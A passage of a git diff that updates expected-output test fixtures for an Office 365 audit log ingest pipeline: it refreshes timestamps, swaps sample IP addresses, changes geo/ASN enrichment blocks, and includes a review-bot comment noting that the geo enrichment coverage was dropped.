diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json
index fdd79e1b1b9..dc54941893b 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json
@@ -26,7 +26,7 @@
 "ip": "10.11.12.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.058002800Z",
+ "ingested": "2021-12-09T13:42:43.978949100Z",
 "original": "{\"ClientIP\":\"[10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
 "kind": "event",
 "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
@@ -71,7 +71,7 @@
 "ip": "10.11.12.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.058009500Z",
+ "ingested": "2021-12-09T13:42:43.978959100Z",
 "original": "{\"ClientIP\":\"10.11.12.13:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
 "kind": "event",
 "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
@@ -114,7 +114,7 @@
 "ip": "10.11.12.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.058011400Z",
+ "ingested": "2021-12-09T13:42:43.978963500Z",
 "original": "{\"ClientIP\":\"10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
 "kind": "event",
 "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
@@ -157,7 +157,7 @@
 "ip": "10.11.12.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.058013100Z",
+ "ingested": "2021-12-09T13:42:43.978967600Z",
 "original": "{\"ClientIP\":\"::ffff:10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
 "kind": "event",
 "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
@@ -202,7 +202,7 @@
 "ip": "10.11.12.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.058014900Z",
+ "ingested": "2021-12-09T13:42:43.978971100Z",
 "original": "{\"ClientIP\":\"[::ffff:10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
 "kind": "event",
 "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
@@ -234,21 +234,36 @@
 },
 "related": {
 "ip": [
- "2001:db8::abcd"
+ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 ]
 },
 "client": {
 "port": 12345,
- "address": "2001:db8::abcd",
- "ip": "2001:db8::abcd"
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "source": {
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
 "port": 12345,
- "ip": "2001:db8::abcd"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.058016700Z",
- "original": "{\"ClientIP\":\"[2001:db8::abcd]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
+ "ingested": "2021-12-09T13:42:43.978975700Z",
+ "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}",
 "kind": "event",
 "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
 "type": [
@@ -279,19 +294,34 @@ }, "related": { "ip": [ - "2001:db8::abcd" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "client": { - "address": "2001:db8::abcd", - "ip": "2001:db8::abcd" + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "ip": "2001:db8::abcd" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-06-17T07:32:54.058018400Z", - "original": "{\"ClientIP\":\"2001:db8::abcd\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", + "ingested": "2021-12-09T13:42:43.978981800Z", + "original": "{\"ClientIP\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "type": [ @@ -321,11 +351,11 @@ "version": "1.12.0" }, "client": { - "domain": "[2001:db8::abcd]" + "domain": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]" }, "event": { - "ingested": "2021-06-17T07:32:54.058020100Z", - "original": "{\"ClientIP\":\"[2001:db8::abcd]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", + "ingested": "2021-12-09T13:42:43.978987800Z", + "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "type": [ 
@@ -355,7 +385,7 @@ "domain": "[10.11.12.13]" }, "event": { - "ingested": "2021-06-17T07:32:54.058021700Z", + "ingested": "2021-12-09T13:42:43.978993800Z", "original": "{\"ClientIP\":\"[10.11.12.13]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -386,7 +416,7 @@ "domain": "localhost" }, "event": { - "ingested": "2021-06-17T07:32:54.058023300Z", + "ingested": "2021-12-09T13:42:43.978999700Z", "original": "{\"ClientIP\":\"localhost\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -417,7 +447,7 @@ "domain": "[localhost]:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058025100Z", + "ingested": "2021-12-09T13:42:43.979005600Z", "original": "{\"ClientIP\":\"[localhost]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -448,7 +478,7 @@ "domain": "localhost:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058026900Z", + "ingested": "2021-12-09T13:42:43.979012Z", "original": "{\"ClientIP\":\"localhost:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -479,7 +509,7 @@ "domain": "[cool.client.local]:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058028700Z", + "ingested": "2021-12-09T13:42:43.979018Z", "original": "{\"ClientIP\":\"[cool.client.local]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", 
@@ -510,7 +540,7 @@ "domain": "cool.client.local" }, "event": { - "ingested": "2021-06-17T07:32:54.058030500Z", + "ingested": "2021-12-09T13:42:43.979024Z", "original": "{\"ClientIP\":\"cool.client.local\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -541,7 +571,7 @@ "domain": "cool.client.local:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058035500Z", + "ingested": "2021-12-09T13:42:43.979030Z", "original": "{\"ClientIP\":\"cool.client.local:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json index e5591652fcb..445df521aee 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.261542200Z", + "ingested": "2021-12-09T13:42:44.905415600Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"49fa9883-50a9-4c9c-8e12-57e0948a9d8a\",\"Operation\":\"TeamCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"Application\",\"UserKey\":\"\",\"UserType\":5,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", 
@@ -113,7 +113,7 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.261548500Z",
+ "ingested": "2021-12-09T13:42:44.905426400Z",
 "original": "{\"CreationTime\":\"2020-02-17T16:59:47\",\"Id\":\"3a951c24-3214-5529-b2fe-097628a39ecd\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"David\",\"Role\":1,\"UPN\":\"david@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Chuck\",\"Role\":1,\"UPN\":\"chuck@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Bob\",\"Role\":1,\"UPN\":\"bob@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Alice\",\"Role\":1,\"UPN\":\"alice@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}",
 "code": "MicrosoftTeams",
 "provider": "MicrosoftTeams",
@@ -183,7 +183,7 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.261550500Z",
+ "ingested": "2021-12-09T13:42:44.905434200Z",
 "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"3350cfd2-1020-5b11-99d8-2701f3a29ea3\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"Alan Smithee\",\"Role\":2,\"UPN\":\"asr@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}",
 "code": "MicrosoftTeams",
 "provider": "MicrosoftTeams",
@@ -241,7 +241,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.261552400Z", + "ingested": "2021-12-09T13:42:44.905438900Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:34\",\"Id\":\"d7636db2-859f-437e-8dff-573726578ad7\",\"ObjectId\":\"Unknown (Unknown)\",\"Operation\":\"TeamsSessionStarted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"UserId\":\"bob@testsiem.onmicrosoft.com\",\"UserKey\":\"d0e0cfb0-284d-4b0a-83fe-dd543a1c1ed0\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json index 58c0f2a1127..a202e49e289 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json 
@@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"79.159.11.115\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"79.159.11.115\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}" + "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"67.43.156.13\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" 
-Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"67.43.156.13\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}" }, "o365audit": { "CreationTime": "2021-02-05T09:06:07", @@ -15,7 +15,7 @@ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", - "ClientIP": "79.159.11.115", + "ClientIP": "67.43.156.13", "ObjectId": "Unknown", "UserId": "root@testsiem4.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, @@ -32,7 +32,7 @@ } ], "ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "ActorIpAddress": "79.159.11.115", + "ActorIpAddress": "67.43.156.13", "InterSystemsId": "df4c6d6c-4551-4f2d-8766-03700dfccb47", "IntraSystemId": "550ed0e2-27da-4cbc-9fb8-46add4018800", "SupportTicketId": "", 
@@ -49,10 +49,10 @@ }, { "event": { - "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (15.20.242.17)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}" + "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (67.43.156.13)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, 
\"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}" }, "o365audit": { - "OriginatingServer": "HE1PR0102MB3228 (15.20.253.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "ClientAppId": "", "OrganizationName": "testsiem.onmicrosoft.com", "ObjectId": "EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json index 2af884ee63d..5c2138c99c5 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.11.115" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
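Review bot: In the `@@ -2,25 +2,7 @@` hunk of test-parameter-string.json-expected.json the `source.geo` and `source.as` blocks are deleted outright rather than replaced with the enrichment for the new address, so the expectation no longer exercises the geoip/ASN path at all; the same happens in the `source` hunks of test-sharepoint-events.json-expected.json. If the test GeoIP database that elastic-package ships covers the 67.43.156.0/24 range (the changelog entry in this commit calls these "the supported subset"), the regenerated expectation would be expected to carry `source.geo`/`source.as` for 67.43.156.13, and their absence may mean the geoip processor did not run when these files were regenerated. It would be worth regenerating with the test database confirmed present, or, if geo enrichment is intentionally out of scope for this test, saying so in the commit description so the dropped coverage is deliberate.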
@@ -34,7 +16,7 @@ "ObjectId": "Unknown", "ResultStatus": "Success", "UserKey": "21119711-1517-43d4-8138-b537dafad016", - "ActorIpAddress": "79.159.11.115", + "ActorIpAddress": "67.43.156.13", "ErrorNumber": "0", "ExtendedProperties": { "_raw": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"" @@ -78,7 +60,7 @@ "root" ], "ip": [ - "79.159.11.115" + "67.43.156.13" ] }, "organization": { 
@@ -89,12 +71,12 @@ "id": "48622b8f-44d3-420c-b4a2-510c8165767e" }, "client": { - "address": "79.159.11.115", - "ip": "79.159.11.115" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:54.349451200Z", - "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"79.159.11.115\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"79.159.11.115\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}", + "ingested": "2021-12-09T13:42:45.343188600Z", + "original": 
"{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"67.43.156.13\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"67.43.156.13\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -120,12 +102,12 @@ }, { "server": { - "address": "15.20.253.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.253.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.253.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -154,7 +136,7 @@ }, "related": { "ip": [ - "15.20.253.17" + "67.43.156.13" ] }, "organization": { 
@@ -166,8 +148,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.349456700Z", - "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (15.20.242.17)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": 